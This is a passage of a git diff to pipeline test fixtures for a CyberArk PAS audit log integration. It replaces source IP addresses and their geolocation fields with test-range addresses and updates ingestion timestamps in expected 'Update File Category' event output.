"lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -250,20 +215,20 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:38:26Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003eroot\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Update File Category", "issuer": "PSMPApp_VAGRANT", "rfc5424": true, "file": "root\\87012dcc-8290-11eb-949e-080027efd402.session", "safe": "PSMRecordings", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Update File Category", "category": "PSMStatus", "timestamp": "Mar 11 09:38:26", @@ -276,8 +241,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164169900Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.session\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"PSMStatus\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540147600Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.session\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"PSMStatus\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } @@ -289,19 +254,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -321,20 +275,20 @@ }, "related": { "ip": [ - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T20:10:33Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Update File Category", "issuer": "PSMApp_ASR-WIN", "rfc5424": true, "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions", "safe": "PSMLiveSessions", - "station": "34.66.114.180", + "station": "67.43.156.15", "action": "Update File Category", "category": "_PSMLiveSessions_1", "timestamp": "Mar 11 12:10:33", @@ -347,8 +301,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164177600Z", - "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"34.66.114.180\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540154900Z", + "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } @@ -360,17 +314,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -390,20 +335,20 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:38Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Update File Category", "issuer": "PSMPApp_SSH", "rfc5424": true, "file": "Root\\PSMPApp_SSH.LiveSessions", "safe": "PSMPLiveSessions", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Update File Category", "category": "_PSMLiveSessions_1", "timestamp": "Mar 14 06:49:38", @@ -416,8 +361,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164182400Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:38\",\"IsoTimestamp\":\"2021-03-14T13:49:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540163300Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:38\",\"IsoTimestamp\":\"2021-03-14T13:49:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log index 92fadaab728..2d3df674fa8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log @@ -1 +1 @@ -<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 